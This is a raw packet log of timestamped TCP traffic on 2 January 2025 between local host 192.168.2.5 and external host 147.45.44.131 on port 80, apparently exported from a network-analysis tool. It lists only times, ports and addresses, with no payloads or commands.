Jan 2, 2025 19:14:15.203413963 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203432083 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.203450918 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.203562975 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203574896 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203584909 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203596115 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203608990 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203619957 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.203619957 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203633070 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203643084 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203655005 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203671932 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203672886 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.203672886 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.203684092 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203696966 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203712940 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.203712940 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.203838110 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.203838110 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203865051 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203879118 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203960896 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203974009 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203986883 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203999996 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.204001904 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.204010963 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.204020977 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.204025030 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.204036951 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.204055071 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.204065084 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.204075098 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.204087973 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.204102039 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.204103947 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.204113960 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.204127073 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.204139948 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.204139948 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.204184055 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.204195976 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.204209089 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.204220057 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.204222918 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.204231977 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.204279900 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.204299927 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.204313040 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.204313040 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.204348087 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.204359055 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.204365015 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.204369068 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.204374075 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.204416990 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.204428911 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.204441071 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.204457045 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.204471111 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.204478025 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.204478025 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.204483032 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.204495907 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.204518080 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.204747915 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.249397993 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.249429941 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.249440908 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.249452114 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.249469995 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.249481916 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.249495029 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.249509096 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.249588966 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.249649048 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.286662102 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.286734104 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.286744118 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.286761045 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.286773920 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.286787033 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.286798000 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.286832094 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.286832094 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.287647009 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.287728071 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.287738085 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.287749052 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.287765026 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.287775993 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.287786961 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.287797928 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.287800074 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.287910938 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.287949085 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.288068056 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.288079977 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.288081884 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.288110018 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.288127899 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.288146019 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.288149118 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.288161039 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.288173914 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.288180113 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.288184881 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.288196087 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.288207054 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.288218021 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.288228989 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.288239002 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.288247108 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.288258076 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.288259029 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.288286924 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.288397074 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.289145947 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289155960 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289169073 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289187908 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289199114 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289210081 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289216995 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.289222002 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289227009 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.289298058 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289310932 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289321899 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289346933 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289355040 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.289366961 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289383888 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.289383888 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.289390087 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289407969 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289418936 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289419889 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.289432049 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289496899 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.289582014 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289657116 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289659023 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.289668083 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289685965 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289697886 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289707899 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289720058 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289721966 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.289731026 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289742947 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289752007 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289769888 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.289769888 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.289772987 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289789915 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289800882 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289818048 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.289819002 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.289819956 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289833069 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289839983 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.289875031 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.289887905 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289931059 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289942026 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289952040 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289963007 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.289988995 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.290049076 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290062904 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290072918 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290079117 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290088892 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290112972 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.290205956 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290219069 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290235996 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290245056 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.290247917 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290261984 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290265083 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.290275097 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290290117 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290317059 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.290317059 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.290349007 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290361881 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290371895 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290384054 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290389061 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.290395021 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290407896 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290416956 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.290416956 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.290420055 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290508032 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.290608883 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290627956 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290640116 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290679932 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290690899 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290703058 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290716887 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290720940 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.290720940 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.290731907 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290741920 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.290744066 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290776968 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290801048 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290812969 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290813923 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.290813923 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.290854931 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290867090 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290877104 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290890932 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290898085 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.290916920 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.290916920 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.290920019 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290947914 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290960073 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.290987968 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.291038036 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.291074991 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.291086912 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.291105032 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.291110992 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.291115999 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.291126966 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.291132927 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.291145086 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.291146994 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.291162014 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.291184902 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.291194916 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.291204929 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.291207075 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.291207075 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.291217089 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.291246891 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.291449070 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.336179972 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.336250067 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.336266041 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.336277008 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.336287975 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.336301088 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.336311102 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.336322069 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.336345911 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.336345911 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.336405993 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.373379946 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.373389959 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.373402119 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.373440981 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.373450994 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.373466969 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.373478889 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.373492002 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.373527050 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.373527050 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.373527050 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.373527050 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.374521017 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.374532938 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.374542952 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.374562979 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.374578953 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.374592066 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.374598026 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.374603033 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.374617100 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.374627113 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.374634981 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.374666929 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.374692917 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.374694109 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.374716043 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.374726057 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.374788046 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.374799013 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.374809027 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.374819040 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.374824047 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.374829054 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.374840975 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.374852896 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.374852896 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.374924898 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.374958992 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.374969006 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.374979019 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.374989033 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.374994993 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.374995947 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.375005960 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.375143051 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.375832081 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.375893116 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.375902891 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.375911951 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.375921011 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.375924110 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.375936031 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.375969887 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.375969887 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.376014948 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.376025915 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.376072884 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.376121998 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.376142025 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.376173973 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.376184940 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.376194954 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.376207113 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.376247883 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.376281977 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.376358032 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.376391888 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.376399040 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.376403093 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.376435041 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.376465082 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.376488924 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.376498938 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.376509905 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.376522064 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.376542091 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.376591921 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.376591921 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.376605034 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.376616001 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.376626968 CET	80	49721	147.45.44.131	192.168.2.5
